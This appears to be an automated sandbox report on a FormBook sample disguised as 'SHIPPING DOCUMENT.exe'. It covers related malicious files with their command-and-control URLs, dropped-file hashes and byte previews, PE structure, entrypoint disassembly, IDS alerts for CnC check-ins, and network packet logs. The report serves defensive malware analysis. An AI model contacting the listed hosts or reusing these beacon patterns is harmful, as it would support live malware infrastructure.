                                          • www.calmncuddle.com/ca84/?BvI=b2S2nlAqkf94DvgS5p4/7HJ/I6FJ9VAC3yY7Dn54mkFcHBVvzbYxVttZk7rYdKw4iUSE&J690D=ej8PjzaXfDt
                                          NQ1vVJKBcH.exeGet hashmaliciousBrowse
                                          • www.yashaxi.com/sdh/?ArR=pv77fZTsJCF4Ec5vscLwE01hgHoFOGvdvEJpexrJMVXWZtOzLqqRHfmNiKriOCyuhwCB&_jqp3R=mvR89v50jF6X
                                          A9C9824497908A525A168C43D743FEA3D1F5DC4C3004E.exeGet hashmaliciousBrowse
                                          • cryptofaze.com/index.php
                                          RDAx9iDSEL.exeGet hashmaliciousBrowse
                                          • www.trendbold.com/p2io/?NtTdXn=wXL40t9Hkrxhn&KtxL=YuHUVBRMKFCf6NGuNX6aejQt13LdGy2QNXWf2AVYUUbkg/qzJ+lSsvfEiDwNVcpNHrzg
                                          Yd7WOb1ksAj378N.exeGet hashmaliciousBrowse
                                          • www.yashaxi.com/sdh/?1b8Hsf=pv77fZTsJCF4Ec5vscLwE01hgHoFOGvdvEJpexrJMVXWZtOzLqqRHfmNiKnidS+t4gCXd4CYSg==&j2MHoV=aDKhQD6PL
                                          TT COPY (39.750,00 USD).exeGet hashmaliciousBrowse
                                          • www.fittogo.net/o86d/?8p-LVP8p=u1IKOnF2O/98NudFSWYnxTXzpqVcceYY3hF/Wy28k7osgxzlZYELTmE21wErBFPFXF06&bj=VTWpjpVhfN0xwFd
                                          lFfDzzZYTl.exeGet hashmaliciousBrowse
                                          • www.trendbold.com/p2io/?iBIXf4M=YuHUVBRMKFCf6NGuNX6aejQt13LdGy2QNXWf2AVYUUbkg/qzJ+lSsvfEiAcdJt12AeaxGWCaPA==&_RAd4V=YL0THJvhl8d
                                          SWIFT COPY.exeGet hashmaliciousBrowse
                                          • www.wbz.xyz/fcn/?2d=l8eDk&-Z2hilB=BzqqiqEgWSn4H0nj5q3NVeG0jFLcTOMmsdTr50lz0wrZDnWPoyh/rI5OywZ8yBQmwoLh
                                          1400000004-arrival.exeGet hashmaliciousBrowse
                                          • www.healthpro.info/hwad/?p0D=ViWewpzPt5NCxCWjvt8gvvbWSNygKN3e34Vf9Qt00/TaXPrG4jpuYY6xUt/mVWAfJkXy&wPN=OtWDJt
                                          payment invoice.exeGet hashmaliciousBrowse
                                          • www.healthpro.info/hwad/?b6=ViWewpzPt5NCxCWjvt8gvvbWSNygKN3e34Vf9Qt00/TaXPrG4jpuYY6xUuTlJmMnEFqk5jpuuQ==&CRi=_FN8K4
                                          lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                          • www.trendbold.com/p2io/?E48=YuHUVBRMKFCf6NGuNX6aejQt13LdGy2QNXWf2AVYUUbkg/qzJ+lSsvfEiAckWcV1OIG2GWCdcw==&oPqLWb=dVeDBDrHInjx
                                          PO#EIMG_501_367_089.exeGet hashmaliciousBrowse
                                          • www.healthpro.info/hwad/?a4n=tXLt5bAxNvWd1&FVTD=ViWewpzPt5NCxCWjvt8gvvbWSNygKN3e34Vf9Qt00/TaXPrG4jpuYY6xUufcFHgnTD21
                                          Material Requisition for Quotation (MRQ).exeGet hashmaliciousBrowse
                                          • www.pure-tab.com/ea9e/?MvyX=RhJcbY/87Jh8L+sEB9htMI61pUz/7YIRuLTc8dYvVpTofAQeCaStCENnYxZROgjyrCT5&VPKp=wBNhY2XpgdW42Z
                                          bank payment confirmation.exeGet hashmaliciousBrowse
                                          • www.wfl.xyz/nyd/?v2Mpe=eugD6+dzNk4cgZThSvoact52pzI/j09Lu7ql9fn1MVt/tcTBfLynjjWzFLxVYpnDcWHt&Rxo4n8=RpgHKpR0D
                                          Swift Copy#0002.exeGet hashmaliciousBrowse
                                          • www.ytx.xyz/ve9m/?4h5=k2JX5xRHxZU0PLap&-Z2D=d3g+3hGlG471rl2gQtpnZ/9bIQo5mtPA1dwP828avrl8Fn5x/8540ZGqLo19wTrVHoeP

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          www.union-green.comREQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                          • 154.220.41.208

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          POWERLINE-AS-APPOWERLINEDATACENTERHKc8080fbf_by_Libranalysis.rtfGet hashmaliciousBrowse
                                          • 154.86.42.252
                                          REQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                          • 154.220.41.208
                                          O1E623TjjW.exeGet hashmaliciousBrowse
                                          • 43.230.169.157
                                          SWIT BANK PAPER PAYMENT.exeGet hashmaliciousBrowse
                                          • 154.213.207.4
                                          PO_29_00412.exeGet hashmaliciousBrowse
                                          • 154.216.244.232
                                          z5Wqivscwd.exeGet hashmaliciousBrowse
                                          • 154.88.201.82
                                          8480fe6d_by_Libranalysis.exeGet hashmaliciousBrowse
                                          • 154.88.208.8
                                          S4gONKzrzB.exeGet hashmaliciousBrowse
                                          • 154.216.85.54
                                          PO17439.exeGet hashmaliciousBrowse
                                          • 103.234.52.224
                                          gunzipped.exeGet hashmaliciousBrowse
                                          • 103.234.52.32
                                          FORM C.xlsxGet hashmaliciousBrowse
                                          • 160.124.11.194
                                          TT.exeGet hashmaliciousBrowse
                                          • 156.252.92.240
                                          2sj75tLtYO.exeGet hashmaliciousBrowse
                                          • 154.88.205.42
                                          z3hir.x86Get hashmaliciousBrowse
                                          • 156.242.113.180
                                          Invoice.exeGet hashmaliciousBrowse
                                          • 103.234.52.211
                                          dw0Iro1gcR.exeGet hashmaliciousBrowse
                                          • 160.124.11.194
                                          3fbdTbPuA2dsNJL.exeGet hashmaliciousBrowse
                                          • 154.201.165.231
                                          HXHpRUwveo.exeGet hashmaliciousBrowse
                                          • 156.230.124.222
                                          CATALOG.exeGet hashmaliciousBrowse
                                          • 156.252.92.240
                                          PaymentBNK#2.PDF.exeGet hashmaliciousBrowse
                                          • 154.201.206.137

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\ex08fobkizb
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6661
                                          Entropy (8bit):7.974118270734614
                                          Encrypted:false
                                          SSDEEP:192:CM79ZiFYzt3oSmJndTNzwT4JDPB9QB8Fbwlq:7iFkYJdTmUJ77wlq
                                          MD5:69CF51438619322E76E52330708D6476
                                          SHA1:CF68FE09A25AD784EACD51430B02EFFD02B9E836
                                          SHA-256:B138964C634ECA75042FEE97E056E25FDB7BED585ED1CA2C883CAFFC28184F6F
                                          SHA-512:09CA224E6EAF25BB470F56BA6F1A8EE39296F45D0B56555698C5C35250FE45ACC99CAEBE641E91156C5887D09D768B81B7D3FF9D4A0BDDFE9AC7B77FD13A7B47
                                          Malicious:false
                                          Reputation:low
                                          Preview: .;MH.....].^..SV.j..uF.~..o...s%...'.xXR..s.`.=n}..VlH....\.....5...U.../LC0,.i...96if.U?@=[..D.!52;..-....349.......!......BO........Pi......%.V......x. |..)&'.[YVz.U.....Qs.>.ebJ06K..;..$.................Iv..0..<.]...gx`......_..~.=jJ..w. Y1|}la....g..o..p...YVWy........}...(.ur{.......sty...de..........W...3=G<.)_...5_e:...KLA_*S`..'ifgI....../0M+......%"+.............GX......k .'n....#@~w....I|.,&'.*pu....;.3....W.ba.RM...$...........IL....5/...I6:....V..*.A.J-.0IC...H.{X.........DIF`./..\.y.=ViT.)p....'.(.y."..u..t.oR.Q.v}.*b..$...B.A.{........6wh"..K.5.CB...fW mL.-..f!."..c.5..fJ34..!............MZ....U...i...UD.V.-....y...#.g%.k6t=.}L. .I.p7iy._....O...e.....+..|..M...........B`.c._n...s...oB.........$..(W.%...CD^JUSR..OfNO..iS.....Z.L.+={{zB....s.0...d.....v.x.........>.=......>........A..>L?.../=:[gkm.bE;<...sM..496.c.(.A%% ....F...L[....R.....Tt...........$./.;:...xG.sJ..LG.<...b..a...QP..........'0S)*)........>7-........iz.
                                          C:\Users\user\AppData\Local\Temp\kmvt65sofzhcy6
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):185856
                                          Entropy (8bit):7.999109498781475
                                          Encrypted:true
                                          SSDEEP:3072:d7DdGNe8lzSGePvjqjjGdz2YruLwmPrghVxoMb6im3Ygvadup37:d7DdGNblz7SLqXGdB8HUl613Y1du17
                                          MD5:AACE68FCC1505963CA9578E8AB837594
                                          SHA1:E0EE89C6AE7AC02CED2731C35B4BA81BD3A441CC
                                          SHA-256:1AD3F5A4C5BECBADD1E7C87DCFEE1330A604964B0918FD24DD77E1253476BFE8
                                          SHA-512:B58245FFFDB739549075B2D5CEA031CF4285D063DE2C4726BB0A7F628C30F4784D63A0251482F413B9F39A495CD4C60ECABD6CD55E0FA4AD4D4D9CD10D276821
                                          Malicious:false
                                          Reputation:low
                                          Preview: ~d[....&.`..^.\D..5.....t_.....Na...(g..........\...3.8.....h...]Ud,......n..Lk..~.`>.]N.:m>.C._1..=H....z`.M..x........\.....\..N.+....f........"M. o9...,H.+U.(Y..\.dw......X.\..j.y..Q......5j..:-.........w....4.V........$......9.....~E%..6$F=<.....(.qe.#....9..JsM#s..K...5uoa.U.....9..._...........7.....=....W=.k..u....H......i../>jm.i..zK1b....W..A.{..Il....r.....".E@I.9:3I...a..r.e_...XN]l....w...z{....j.O...wv.j.-..N...... ..P.fL....e.@...d.e..6....U.T.H-Z4.."..m....b...0rhP.$p.>\.[.<y+..3?...Je...<...P..IS......ryR..:..r.{..sG_..`..9..pn..gK...%...Q..?M..!...@.vX.L..<Lu...0...W....~..A\k.ab.S..../. .........Z]....1..+;2u.&>:.'C..<.{!...u.;..}_..W3...z.....;r..z8...n.......F..:..\<.K..Uej)b....X.T...ri....)...&..e~f.]...u.)..&..B.T.!.......w.&.&....1..p.[8.|!H.p..]u.).=....@.h......$.Pu..Cq +..3H.-.x...&.!.........&ua..y...&dS.......c'g....l..;......@.~..... .5$......2..k;B......_T`..s....-\...CY.q....F...zfI..l...Z74..N..
                                          C:\Users\user\AppData\Local\Temp\nseA921.tmp
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):201373
                                          Entropy (8bit):7.948650642039385
                                          Encrypted:false
                                          SSDEEP:3072:EjG7DdGNe8lzSGePvjqjjGdz2YruLwmPrghVxoMb6im3Ygvadup3:Ea7DdGNblz7SLqXGdB8HUl613Y1du1
                                          MD5:22CC1D52F7688CE084D84D06B5B18523
                                          SHA1:C41A04F9646DFC78B1588E47DEFF50A7FF3B43A2
                                          SHA-256:261A44AAD8BE10E8CA564F30810D9984A5CCFE4231E47987B9276777079C8BF1
                                          SHA-512:A7C9FF520347982CA333AEF083ADB8839C5899A0A7A6755313AD8009C25F84573F990E32B10E4B5F0A6F03B0387ECCA8570D56223E31F84FB69A79A198DE2F19
                                          Malicious:false
                                          Reputation:low
                                          Preview: ........,...................................................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dll
                                          Process:C:\Users\user\Desktop\SHIPPING DOCUMENT.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5632
                                          Entropy (8bit):4.090507095598033
                                          Encrypted:false
                                          SSDEEP:48:qixZ/QGn1ASkT3jNDZbitP8Xst6F22ltnl0qe/hqHht0j9Pl4jdajpqKncLjNS3I:Bhn1ASknNDZ+tltm2InlLRul4jdkpN3
                                          MD5:45ADFA33A0E6A780E55F543A36143542
                                          SHA1:540BBBF9EC26DDEF911BA80EE0365CF23B687749
                                          SHA-256:5299A5C9BA1296DB0A9F804741B58EC7A0FEDAEF8937E3CDC21D3523E0449EE3
                                          SHA-512:2AD608026D78DEDD9F803B6A2F7E27E5590D9DF5870ADECCBDFC353B1D546450075743B499EBCF57F8D67886188DB92BA8F968B4D71FED624FD948D3B047A0E3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Reputation:low
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.}XX..XX..XX...0./]X....,.UX..XX..xX...1./YX...1./YX...1./YX..RichXX..........PE..L...]b.`...........!......................... ...............................@......................................p!..P...."....................................... ............................... ..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...D....0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.896133124119752
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:SHIPPING DOCUMENT.exe
                                          File size:233957
                                          MD5:25e847b9631bc2fe8d87fe4278fa142e
                                          SHA1:641756a84fdce68e101a53cfa6809b68190b7ad7
                                          SHA256:70dfd7bc81878d265e39803f73f55af96d7bf2a336408b52cc6005785fbe0415
                                          SHA512:82c1e56fa6a6611c45057c80190d2d7d220294a690044a164cdda39bc5e26b8c35d76433e3b1d7d247ef464d3307911a4a4337e52163177f4322fbe67579dabd
                                          SSDEEP:6144:lPXZ+Qpc3dgPKMqFsSa94wwuYc3ZqiU5OPiNCPEXH:T+Qpc3dg4GS+4w5YcxiXH
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x403461
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+18h], ebx
                                          mov dword ptr [esp+10h], 0040A130h
                                          mov dword ptr [esp+20h], ebx
                                          mov byte ptr [esp+14h], 00000020h
                                          call dword ptr [004080B0h]
                                          call dword ptr [004080C0h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [0042474Ch], eax
                                          je 00007F38E0BFA453h
                                          push ebx
                                          call 00007F38E0BFD5CEh
                                          cmp eax, ebx
                                          je 00007F38E0BFA449h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082A0h
                                          push esi
                                          call 00007F38E0BFD54Ah
                                          push esi
                                          call dword ptr [004080B8h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F38E0BFA42Dh
                                          push 0000000Bh
                                          call 00007F38E0BFD5A2h
                                          push 00000009h
                                          call 00007F38E0BFD59Bh
                                          push 00000007h
                                          mov dword ptr [00424744h], eax
                                          call 00007F38E0BFD58Fh
                                          cmp eax, ebx
                                          je 00007F38E0BFA451h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007F38E0BFA449h
                                          or byte ptr [0042474Fh], 00000040h
                                          push ebp
                                          call dword ptr [00408038h]
                                          push ebx
                                          call dword ptr [00408288h]
                                          mov dword ptr [00424818h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041FD10h
                                          call dword ptr [0040816Ch]
                                          push 0040A1ECh

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xa50.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x623c0x6400False0.65859375data6.40257705324IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x80000x12740x1400False0.43359375data5.05749598324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xa0000x1a8580x600False0.445963541667data4.08975001509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x2d0000xa500xc00False0.402994791667data4.1909607241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x2d1900x2e8dataEnglishUnited States
                                          RT_DIALOG0x2d4780x100dataEnglishUnited States
                                          RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                          RT_DIALOG0x2d6980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                          RT_MANIFEST0x2d7100x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                          SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                          ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                          USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          05/04/21-20:11:56.504622TCP1201ATTACK-RESPONSES 403 Forbidden804976234.102.136.180192.168.2.4
                                          05/04/21-20:12:37.590909TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4154.220.41.208
                                          05/04/21-20:12:37.590909TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4154.220.41.208
                                          05/04/21-20:12:37.590909TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4154.220.41.208

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 4, 2021 20:11:36.430535078 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:36.721960068 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:36.722122908 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:36.722306013 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:37.016350031 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016379118 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016396999 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016410112 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016422033 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:37.016550064 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:37.016580105 CEST4975480192.168.2.4107.151.79.234
                                          May 4, 2021 20:11:37.309417009 CEST8049754107.151.79.234192.168.2.4
                                          May 4, 2021 20:11:56.325994015 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.367203951 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:11:56.367348909 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.367537022 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.408456087 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:11:56.504621983 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:11:56.504673958 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:11:56.504898071 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.504939079 CEST4976280192.168.2.434.102.136.180
                                          May 4, 2021 20:11:56.545893908 CEST804976234.102.136.180192.168.2.4
                                          May 4, 2021 20:12:16.770282984 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.815764904 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:16.815901041 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.816143990 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.861567974 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:16.892096996 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:16.892129898 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:16.892287016 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.892380953 CEST4976580192.168.2.464.190.62.111
                                          May 4, 2021 20:12:16.937747002 CEST804976564.190.62.111192.168.2.4
                                          May 4, 2021 20:12:37.285511017 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:37.590425968 CEST8049766154.220.41.208192.168.2.4
                                          May 4, 2021 20:12:37.590872049 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:37.590909004 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:37.893582106 CEST8049766154.220.41.208192.168.2.4
                                          May 4, 2021 20:12:37.898349047 CEST8049766154.220.41.208192.168.2.4
                                          May 4, 2021 20:12:37.898365021 CEST8049766154.220.41.208192.168.2.4
                                          May 4, 2021 20:12:37.898538113 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:37.898602962 CEST4976680192.168.2.4154.220.41.208
                                          May 4, 2021 20:12:38.204751968 CEST8049766154.220.41.208192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 4, 2021 20:10:23.100471973 CEST6464653192.168.2.48.8.8.8
                                          May 4, 2021 20:10:23.172450066 CEST53646468.8.8.8192.168.2.4
                                          May 4, 2021 20:10:24.091864109 CEST6529853192.168.2.48.8.8.8
                                          May 4, 2021 20:10:24.140894890 CEST53652988.8.8.8192.168.2.4
                                          May 4, 2021 20:10:25.898332119 CEST5912353192.168.2.48.8.8.8
                                          May 4, 2021 20:10:25.950277090 CEST53591238.8.8.8192.168.2.4
                                          May 4, 2021 20:10:26.661243916 CEST5453153192.168.2.48.8.8.8
                                          May 4, 2021 20:10:26.709969997 CEST53545318.8.8.8192.168.2.4
                                          May 4, 2021 20:10:28.094921112 CEST4971453192.168.2.48.8.8.8
                                          May 4, 2021 20:10:28.144993067 CEST53497148.8.8.8192.168.2.4
                                          May 4, 2021 20:10:28.895927906 CEST5802853192.168.2.48.8.8.8
                                          May 4, 2021 20:10:28.944466114 CEST53580288.8.8.8192.168.2.4
                                          May 4, 2021 20:10:29.856165886 CEST5309753192.168.2.48.8.8.8
                                          May 4, 2021 20:10:29.915005922 CEST53530978.8.8.8192.168.2.4
                                          May 4, 2021 20:10:29.961313009 CEST4925753192.168.2.48.8.8.8
                                          May 4, 2021 20:10:30.012523890 CEST53492578.8.8.8192.168.2.4
                                          May 4, 2021 20:10:31.803365946 CEST6238953192.168.2.48.8.8.8
                                          May 4, 2021 20:10:31.853471994 CEST53623898.8.8.8192.168.2.4
                                          May 4, 2021 20:10:32.708785057 CEST4991053192.168.2.48.8.8.8
                                          May 4, 2021 20:10:32.760482073 CEST53499108.8.8.8192.168.2.4
                                          May 4, 2021 20:10:33.501606941 CEST5585453192.168.2.48.8.8.8
                                          May 4, 2021 20:10:33.554955959 CEST53558548.8.8.8192.168.2.4
                                          May 4, 2021 20:10:34.857012033 CEST6454953192.168.2.48.8.8.8
                                          May 4, 2021 20:10:34.905607939 CEST53645498.8.8.8192.168.2.4
                                          May 4, 2021 20:10:35.967181921 CEST6315353192.168.2.48.8.8.8
                                          May 4, 2021 20:10:36.015979052 CEST53631538.8.8.8192.168.2.4
                                          May 4, 2021 20:10:36.764503956 CEST5299153192.168.2.48.8.8.8
                                          May 4, 2021 20:10:36.818133116 CEST53529918.8.8.8192.168.2.4
                                          May 4, 2021 20:10:37.895534992 CEST5370053192.168.2.48.8.8.8
                                          May 4, 2021 20:10:37.944308043 CEST53537008.8.8.8192.168.2.4
                                          May 4, 2021 20:10:38.794277906 CEST5172653192.168.2.48.8.8.8
                                          May 4, 2021 20:10:38.845922947 CEST53517268.8.8.8192.168.2.4
                                          May 4, 2021 20:10:39.904228926 CEST5679453192.168.2.48.8.8.8
                                          May 4, 2021 20:10:39.953146935 CEST53567948.8.8.8192.168.2.4
                                          May 4, 2021 20:10:41.021723032 CEST5653453192.168.2.48.8.8.8
                                          May 4, 2021 20:10:41.070427895 CEST53565348.8.8.8192.168.2.4
                                          May 4, 2021 20:10:42.201668024 CEST5662753192.168.2.48.8.8.8
                                          May 4, 2021 20:10:42.266638041 CEST53566278.8.8.8192.168.2.4
                                          May 4, 2021 20:10:43.036648035 CEST5662153192.168.2.48.8.8.8
